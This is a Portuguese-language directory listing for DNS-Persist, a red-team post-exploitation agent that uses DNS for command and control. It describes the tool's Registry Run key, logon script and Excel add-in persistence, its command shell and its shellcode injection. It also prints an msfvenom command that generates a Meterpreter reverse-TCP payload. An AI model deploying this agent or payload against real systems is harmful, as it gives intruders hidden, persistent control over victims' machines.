Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DNS-Persist — DNS-Persist is a post-exploitation agent which uses DNS for command and control. | Kitploit
Ferramentas/GitHubGitHub/0x09al/dns-persist
Payload GenerationPersistence MechanismsShellcodePost-ExploitationPenetration TestingCommand and ControlRed TeamingDNS Analysis
GitHub0x09al/dns-persist

DNS-Persist

DNS-Persist is a post-exploitation agent which uses DNS for command and control.

Ver Repositório
20763há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

DNS-Persist

DNS-Persist é um agente de pós-exploração que utiliza DNS para comando e controle. O código do lado do servidor está em Python e o agente é codificado em C++. Esta é a primeira versão, mais funcionalidades e melhorias serão adicionadas no futuro.

Começando

Autor

0x09AL - https://twitter.com/0x09al

Aviso Legal

NÃO USE ESTE SOFTWARE PARA FINS ILEGAIS.

O AUTOR NÃO SE RESPONSABILIZA POR QUALQUER USO INDEVIDO DO CÓDIGO AQUI FORNECIDO.

Eu reinventei a roda?

Há muitos trabalhos excelentes sobre DNS C2, mas criei este software para focar mais na parte de persistência. Não sou especialista em C++ e este é meu primeiro "programa real" em C++ (então espere algum código digno de vergonha alheia).

Sugestões sobre funcionalidades e melhorias são bem-vindas.

Arquitetura

Existem duas partes principais:

  1. Servidor DNS
  2. Agente

texto alternativo

Funcionalidades

Mecanismos de persistência

Esta versão possui apenas 3 mecanismos de persistência. Mais serão adicionados posteriormente.

  1. Persistência via LogonScript.
  2. Persistência via RunKey.
  3. Persistência via Add-in do Excel.

Shell de comandos 'interativo'

Esta versão suporta um shell de comandos pseudo-interativo que você pode usar para executar comandos do sistema.

Injeção de Shellcode

Esta versão suporta injeção de shellcode de 32 bits. O shellcode é executado em uma nova thread no mesmo processo, então um shellcode com falha ou inválido também derrubará o agente. Evite bytes NULL no shellcode.

Exemplo de geração de shellcode

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

LISTA DE TAREFAS

  1. Adicionar criptografia. Esta versão não possui nenhuma criptografia, portanto, assuma seus próprios riscos ao usá-la.
  2. Adicionar mais mecanismos de persistência.
  3. Agente em diferentes linguagens de programação.

Instalação e Uso

Lado do servidor

root@kitploit:~
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

Por padrão, um servidor DNS na porta 53 será iniciado. Você pode alterar isso no arquivo server.py.

Agente

Usei o Visual Studio 2010 para codificar o agente, então importá-lo e compilá-lo deve ser bastante fácil.

Lembre-se de alterar a variável DOMAIN_NAME em Declarations.h para corresponder ao seu nome de domínio.

Os servidores de nomes do domínio devem apontar para o endereço IP do DNS-Persist.

root@kitploit:~
#define DOMAIN_NAME "example.com"

Capturas de tela

  1. Imagem-1

texto alternativo

  1. Imagem-2

texto alternativo

  1. Imagem-3

texto alternativo

  1. Imagem-4

texto alternativo

Baixar ferramenta